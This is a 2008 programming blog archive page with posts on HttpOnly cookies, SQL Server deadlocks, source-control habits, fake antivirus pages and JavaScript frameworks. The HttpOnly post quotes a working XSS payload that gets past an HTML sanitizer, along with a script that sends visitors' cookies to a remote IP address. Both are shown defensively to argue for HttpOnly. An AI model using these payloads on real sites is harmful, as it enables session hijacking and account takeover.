August 28, 2008
Protecting Your Cookies: HttpOnly
So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?
As it turns out, far more dangerous than expected.
To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It's all done with HTTP cookies, right? Those tiny little identifiying headers sent up by the browser to the server on your behalf. They're the keys to your identity as far as the website is concerned.
Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder. So tricksy things like:
<script>alert('hello XSS!');</script>
are automagically converted into their harmless encoded equivalents:
<script>alert('hello XSS!');</script>
In my friend's defense (not that he deserves any kind of defense) the website he's working on allows some HTML to be posted by users. It's part of the design. It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user. You're put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.
Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.
How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.
<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www.a.com/a.jpg</script>"
Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:
window.location="http://1.2.3.4:81/r.php?u=" +document.links[1].text +"&l="+document.links[1] +"&c="+document.cookie;
That's right -- whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!
As we've already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don't believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That's all it takes. It's quite an eye opener.
If cookies are so precious, you might find yourself asking why browsers don't do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.
When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:
- A modern web browser
- A browser that actually implements HttpOnly correctly
The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I'm not sure if the latest versions of Safari do or not. It's sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a bowser which isn't exactly known for its iron-clad security record.
Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here's what a cookie looks like with the HttpOnly flag set:
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Encoding: gzip Vary: Accept-Encoding Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly X-Powered-By: ASP.NET Date: Tue, 26 Aug 2008 10:51:08 GMT Content-Length: 2838
This isn't exactly news; Scott Hanselman wrote about HttpOnly a while ago. I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds". In his defense, this was way back in 2005. A dark, primitive time. Almost pre YouTube.
HttpOnly cookies can in fact be remarkably effective. Here's what we know:
- HttpOnly restricts all access to
document.cookiein IE7, Firefox 3, and Opera 9.5 (unsure about Safari) - HttpOnly removes cookie information from the response headers in
XMLHttpObject.getAllResponseHeaders()in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug. XMLHttpObjectsmay only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.
The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.
Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!
HttpOnly cookies don't make you immune from XSS cookie theft, but they raise the bar considerably. It's practically free, a "set it and forget it" setting that's bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.
Now I just need to go tell my friend about them. I'm not sure why I bother. He never listens to me anyway.
(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)
| [advertisement] Read the largest case study ever published about lightweight peer code review in Best Kept Secrets of Peer Code Review. Free book, free shipping. |
August 24, 2008
Deadlocked!
You may have noticed that my posting frequency has declined over the last three weeks. That's because I've been busy building that Stack Overflow thing we talked about.
It's going well so far. Joel Spolsky also seems to think it's going well, but he's one of the founders so he's clearly biased. For what it's worth, Robert Scoble was enthused about Stack Overflow, though it did not make him cry. Still, I was humbled by the way Robert picked this up so enthusiastically through the community. I hadn't contacted him in any way; I myself only found out about his reaction third hand.
That's not to say everything has been copacetic. One major surprise in the development of Stack Overflow was this recurring and unpredictable gem:
Transaction (Process ID 54) was deadlocked on lock resources with another process and has been chosen as the deadlock victim. Rerun the transaction.
Deadlocks are a classic computer science problem, often taught to computer science students as the Dining Philosophers puzzle.
Five philosophers sit around a circular table. In front of each philosopher is a large plate of rice. The philosophers alternate their time between eating and thinking. There is one chopstick between each philosopher, to their immediate right and left. In order to eat, a given philosopher needs to use both chopsticks. How can you ensure all the philosophers can eat reliably without starving to death?
Point being, you have two processes that both need access to scarce resources that the other controls, so some sort of locking is in order. Do it wrong, and you have a deadlock -- everyone starves to death. There are lots of scarce resources in a PC or server, but this deadlock is coming from our database, SQL Server 2005.
You can attach the profiler to catch the deadlock event and see the actual commands that are deadlocking. I did that, and found there was always one particular SQL command involved:
UPDATE [Posts] SET [AnswerCount] = @p1, [LastActivityDate] = @p2, [LastActivityUserId] = @p3 WHERE [Id] = @p0
If it detects a deadlock, SQL Server forces one of the deadlocking commands to lose -- specifically the one that uses the least resources. The statement on the losing side varied, but in our case the losing deadlock statement was always a really innocuous database read, like so:
SELECT * FROM [Posts] WHERE [ParentId] = @p0
(Disclaimer: above SQL is simplified for the purpose of this post). This deadlock perplexed me, on a couple levels.
- How can a read be blocked by a write? What possible contention could there be from merely reading the data? It's as if one of the dining philosophers happened to glance over at another philosoper's plate, and the other philosopher, seeing this, screamed "meal viewing deadlock!" and quickly covered his plate with his hands. Yes, it's ridiculous. I don't want to eat your food -- I just want to look at it.
- We aren't doing that many writes. Like most web apps, we're insanely read-heavy. The particular SQL statement you see above only occurs when someone answers a question. As much as I want to believe Stack Overflow will be this massive, rip-roaring success, there just cannot be that many answers flowing through the system in beta. We went through our code with a fine tooth comb, and yep, we're barely writing anywhere except when users ask a question, edit something, or answer a question.
- What about retries? I find it hard to believe that little write would take so incredibly long that a read would have to wait more than a few milliseconds at most.
If you aren't eating -- modifying data -- then how can trivial super-fast reads be blocked on rare writes? We've had good results with SQL Server so far, but I found this behavior terribly disappointing. Although these deadlocks were somewhat rare, they still occurred a few times a day, and I'm deeply uncomfortable with errors I don't fully understand. This is the kind of stuff that quite literally keeps me up at night.
I'll freely admit this could be due to some peculiarities in our code (translated: we suck), and reading through some sample SQL traces of subtle deadlock conditions, it's certainly possible. We racked our brains and our code, and couldn't come up with any obvious boneheaded mistakes. While our database is somewhat denormalized, all of our write conditions are relatively rare and hand-optimized to be small and fast. In all honesty, our app is just not all that complex. It ain't rocket surgery.
If you ever have to troubleshoot database deadlocks, you'll inevitably discover the NOLOCK statement. It works like this:
SELECT * FROM [Posts] with (nolock) WHERE [ParentId] = @p0
It isn't just a SQL Server command -- it also applies to Oracle and MySQL. This sets the transaction isolation level to read uncommitted, also known as "dirty reads". It tells the query to use the lowest possible levels of locking.
But is nolock dangerous? Could you end up reading invalid data with read uncommitted on? Yes, in theory. You'll find no shortage of database architecture astronauts who start dropping ACID science on you and all but pull the building fire alarm when you tell them you want to try nolock. It's true: the theory is scary. But here's what I think:
In theory there is no difference between theory and practice. In practice there is.
I would never recommend using nolock as a general "good for what ails you" snake oil fix for any database deadlocking problems you may have. You should try to diagnose the source of the problem first.
But in practice adding nolock to queries that you absolutely know are simple, straightforward read-only affairs never seems to lead to problems. I asked around, and I got advice from a number of people whose opinions and experience I greatly trust and they, to a (wo)man, all told me the same thing: they've never seen any adverse reaction when using nolock. As long as you know what you're doing. One related a story of working with a DBA who told him to add nolock to every query he wrote!
With nolock / read uncommitted / dirty reads, data may be out of date at the time you read it, but it's never wrong or garbled or corrupted in a way that will crash you. And honestly, most of the time, who cares? If your user profile page is a few seconds out of date, how could that possibly matter?
Adding nolock to every single one of our queries wasn't really an option. We added it to all the ones that seemed safe, but our use of LINQ to SQL made it difficult to apply the hint selectively.
I'm no DBA, but it seems to me the root of our problem is that the default SQL Server locking strategy is incredibly pessimistic out of the box:
The database philosophically expects there will be many data conflicts; with multiple sessions all trying to change the same data at the same time and corruption will result. To avoid this, Locks are put in place to guard data integrity ... there are a few instances though, when this pessimistic heavy lock design is more of a negative than a positive benefit, such as applications that have very heavy read activity with light writes.
Wow, very heavy read activity with light writes. What does that remind me of? Hmm. Oh yes, that damn website we're building. Fortunately, there is a mode in SQL Server 2005 designed for exactly this scenario: read committed snapshot:
Snapshots rely on an entirely new data change tracking method ... more than just a slight logical change, it requires the server to handle the data physically differently. Once this new data change tracking method is enabled, it creates a copy, or snapshot of every data change. By reading these snapshots rather than live data at times of contention, Shared Locks are no longer needed on reads, and overall database performance may increase.
I'm a little disappointed that SQL Server treats our silly little web app like it's a banking application. I think it's incredibly telling that a Google search for SQL Server deadlocks returns nearly twice the results of a query for MySql deadlocks. I'm guessing that MySQL, which grew up on web apps, is much less pessimistic out of the box than SQL Server.
I find that deadlocks are difficult to understand and even more difficult to troubleshoot. Fortunately, it's easy enough to fix by setting read committed snapshot on the database for our particular workload. But I can't help thinking our particular database vendor just isn't as optimistic as they perhaps should be.
| [advertisement] Complimentary paperback book on lightweight peer code review. 10 essays from industry experts. Free shipping. Order Best Kept Secrets of Peer Code Review. |
August 20, 2008
Check In Early, Check In Often
I consider this the golden rule of source control:
Check in early, check in often.
Developers who work for long periods -- and by long I mean more than a day -- without checking anything into source control are setting themselves up for some serious integration headaches down the line. Damon Poole concurs:
Developers often put off checking in. They put it off because they don't want to affect other people too early and they don't want to get blamed for breaking the build. But this leads to other problems such as losing work or not being able to go back to previous versions.My rule of thumb is "check-in early and often", but with the caveat that you have access to private versioning. If a check-in is immediately visible to other users, then you run the risk of introducing immature changes and/or breaking the build.
I'd much rather have small fragments checked in periodically than to go long periods with no idea whatsoever what my coworkers are writing. As far as I'm concerned, if the code isn't checked into source control, it doesn't exist. I suppose this is yet another form of Don't Go Dark; the code is invisible until it exists in the repository in some form.
I'm not proposing developers check in broken code -- but I also argue that there's a big difference between broken code and incomplete code. Isn't it possible, perhaps even desirable, to write your code and structure your source control tree in such a way that you can check your code in periodically as you're building it? I'd much rather have empty stubs and basic API skeletons in place than nothing at all. I can integrate my code against stubs. I can do code review on stubs. I can even help you build out the stubs!
But when there's nothing in source control for days or weeks, and then a giant dollop of code is suddenly dropped on the team's doorstep -- none of that is possible.
Developers that wouldn't even consider adopting the old-school waterfall method of software development somehow have no problem adopting essentially the very same model when it comes to their source control habits.
Perhaps what we need is a model of software accretion. Start with a tiny fragment of code that does almost nothing. Look on the bright side -- code that does nothing can't have many bugs! Test it, and check it in. Add one more small feature. Test that feature, and check it in. Add another small feature. Test that, and check it in. Daily. Hourly, even. You always have functional software. It may not do much, but it runs. And with every checkin it becomes infinitesimally more functional.
If you learn to check in early and check in often, you'll have ample time for feedback, integration, and review along the way. And who knows -- you might even manage to accrete that pearl of final code that you were looking for, too.
| [advertisement] Peer Code Review. No meetings. No busy-work. Customizable workflows and reports. Try Jolt Award-winning Code Collaborator. |
August 17, 2008
The Perils of FUI: Fake User Interface
As a software developer, tell me if you've ever done this:
- Taken a screenshot of something on the desktop
- Opened it in a graphics program
- Gone off to work on something else
- Upon returning to your computer, attempted to click on the screenshot as if it was an actual program.
And let's not forget the common goating technique where you take a screenshot of someone's desktop, make it the desktop background, then proceed to hide every UI element on the screen. The anguished cries as users desperately double-triple-quadruple click on pixels that look exactly like real user interfaces can typically be heard for miles.
I bring this up to generate some sympathy. I get fooled by my own FUI -- Fake User Interface -- at least once a month. If it can happen to us, it can happen to anyone. Which means FUI can be quite dangerous in the wrong hands. Consider Ryan Meray's story:
Okay, so here's an interesting one. My girlfriend is researching stuff on lilies, so she's trying to find the website for the Michigan Regional Lily Society.The website address is http://www.mrls.org/
Feel free and browse there directly, there's nothing wrong with it. But if you don't remember the URL, your first response is to Google it. We google and get this:
http://www.google.com/search?q=Michigan+Regional+Lily+Society
Now, if you're in Firefox, everything is fine. You click that first result, and you get to their website, and you learn about lilies.
However, if you are using IE, be aware, you are about to have a Spyware/Virus alert.
Obviously, the poor Michigian Regional Lily Society has fallen prey to website hackers. (Note that it may have been fixed by the time I'm writing this -- but I duplicated everything I'm about to show you.)
The first clever point is that the website appears fine if you navigate there directly. The malicious JavaScript code inserted into the page checks the referer and does something different if you arrive there via a web search engine. This means the people who own the website, and never arrive there through Google, would be scratching their heads, wondering what all the fuss is about. So the hack survives longer.
But if you do arrive at the MRLS site through a search engine, like a huge percentage of the world does, you're redirected to:
http://scanner.antivir64.com/?aff=1050
The very first thing this page does is minimize the browser (Firefox 3, in this case) and present us with this JavaScript alert:
I'm intentionally juxtaposing the browser and the dialog here, but the browser is way off in the very lower right corner of the display and that dialog is smack dab in the middle of the screen. It is not at all clear that the dialog originated from that web page. It's a primitive technique, but it is surprisingly effective.
I didn't have the guts to click OK on that dialog; I clicked the close button. The browser then expanded to show this convincing "real time virus scan".
The static screenshot does not do it justice; the scrollbar moves, the list of files fly by as they are "scanned", and the web page rather successfully simulates an ersatz UI somewhere between Windows XP and Windows Vista. Of course, we know this Fake User Interface is completely invalid, because it is running in the browser, not on our PC. You and I may understand that distinction, but what about your parents? Your wife? Your children? Your less technically savvy friends? Will they understand this scary, authentic looking virus warning coming from an "encrypted secure site" is all a lie?
Honestly, whose PC doesn't "run slower than normal"? Maybe I would want to know if my computer is infected with Viruses, Adware or Spyware. It's all part of the culture of fear that security software companies -- and let's be honest, Windows security software companies -- cultivate so they can rake in millions of dollars per year hawking their software. The difference here, of course, is that it's increasingly difficult to tell the good guys from the bad guys. That's the downside of fear as a selling point: it cuts equally well in both directions.
Woe betide the poor user who is convinced through the trickery of FUI to install this "antivirus" software. The page does its darndest to convince you to run its payload executable. Any click on the page, no matter where, is interpreted as a download request.
The page also attempts a drive-by download, though those have been auto-blocked for years now.
It's tempting to put this down as yet another iteration of phishing, the forever hack. To be fair, this is exactly the sort of thing web browser phishing filters were designed to prevent. This site was already in the Firefox 3 phishing filter -- but it was not caught by the Internet Explorer 7 phishing filter, so I reported it.
I am all for phishing filters as another important line of defense, but like all distributed blacklists, they're only so effective.
What I'm more concerned about here is how well the user interface was spoofed. The browser FUI was convincing enough to even make me -- possibly the world's most jaded and cynical Windows user -- do a bit of a double-take. How do you protect naive users from cleverly designed FUI exploits like this one? Can you imagine your mother doing a web search on flowers -- flowers, for God's sake -- clicking on the search results to a totally legitimate website, and correctly navigating the resulting maze of fake UI, spurious javascript alerts, and download dialogs?
I know I can't. As much as I admire distributed phishing blacklist efforts, there's no way they can possibly keep pace with the rapid setup and teardown of hacked websites. How many compromised websites are out there? How many unsophisticated users surf the internet every day?
As always, we can lay a big part of the blame at Microsoft's doorstep for not adopting the UNIX policy of non-administrator accounts for regular users. But then again, if the spoofing is good enough, the FUI extra-convincing, even a Linux or OS X user could be coerced into entering their admin password for a "system security scan". Or maybe they just wanted to see the dancing bunnies.
And then, like Ryan, you're likely to end up with the same infected computer, and the same distraught spouse. All this for the love of a few lilies.
Short of user education, which is a neverending, continuous uphill battle -- how would you combat a perfectly spoofed FUI presented to a naive user?
| [advertisement] Peer code review without meetings, paperwork, or stopwatches? No wonder Code Collaborator won the Jolt Award. |
August 13, 2008
Secrets of the JavaScript Ninjas
One of the early technology decisions we made on Stack Overflow was to go with a fairly JavaScript intensive site. Like many programmers, I've been historically ambivalent about JavaScript:
- The Power of "View Source"
- The Day Performance Didn't Matter Any More
- JavaScript and HTML: Forgiveness by Default
- JavaScript: The Lingua Franca of the Web
- The Great Browser JavaScript Showdown
However, it's difficult to argue with the demonstrated success of JavaScript over the last few years. JavaScript code has gone from being a peculiar website oddity to -- dare I say it -- delivering useful core features on websites I visit on a daily basis. Paul Graham had this to say on the definition of Web 2.0 in 2005:
One ingredient of its meaning is certainly Ajax, which I can still only just bear to use without scare quotes. Basically, what "Ajax" means is "Javascript now works." And that in turn means that web-based applications can now be made to work much more like desktop ones.
Three years on, I can't argue the point: JavaScript now works. Just look around you on the web.
Well, to a point. We can no longer luxuriate in the -- and to be clear, I mean this ironically -- golden age of Internet Explorer 6. We live in a brave new era of increasing browser competition, and that's a good thing. Yes, JavaScript is now mature enough and ubiquitous enough and fast enough to be a viable client programming runtime. But this vibrant browser competition also means there are hundreds of aggravating differences in JavaScript implementations between Opera, Safari, Internet Explorer, and Firefox. And that's just the big four. It is excruciatingly painful to write and test your complex JavaScript code across (n) browsers and (n) operating systems. It'll make you pine for the good old days of HTML 4.0 and CGI.
But now something else is happening, something arguably even more significant than "JavaScript now works". The rise of commonly available JavaScript frameworks means you can write to higher level JavaScript APIs that are guaranteed to work across multiple browsers. These frameworks spackle over the JavaScript implementation differences between browsers, and they've (mostly) done all the ugly grunt work of testing their APIs and validating them against a host of popular browsers and plaforms.
The JavaScript Ninjas have delivered their secret and ultimate weapon: common APIs. They transform working with JavaScript from an unpleasant, write-once-debug-everywhere chore into something that's actually -- dare I say it -- fun.
Frankly, it is foolish to even consider rolling your own JavaScript code to do even the most trivial of things in a browser now. Instead, choose one of these mature, widely tested JavaScript API frameworks. Spend a little time learning it. You'll ultimately write less code that does more -- and (almost) never have to worry a lick about browser compatibility. It's basically browser coding nirvana, as Rick Strahl noted:
I've kind of fallen into a couple of very client heavy projects and jQuery is turning out to be a key part in these particular projects. jQuery is definitely one of those tools that has got me really excited as it has changed my perspective in Web Development considerably from dreading doing client development to actually looking forward to applying richer and more interactive client principles.
There are several popular Javascript API frameworks to choose from:
I don't profess to be an expert in any of these. Far from it. But I will echo what Rick said: using JQuery while writing Stack Overflow is probably the only time in my entire career as a programmer that I have enjoyed writing JavaScript code.
It's sure pleasant to write code against solid, increasingly standardized JavaScript API libraries that spackle over all those infuriating browser differences. I, for one, would like to thank John Resig and all the other JavaScript Ninjas who share their secrets -- and their frameworks -- with the rest of the community.
| [advertisement] Read the largest case study ever published about lightweight peer code review in Best Kept Secrets of Peer Code Review. Free book, free shipping. |


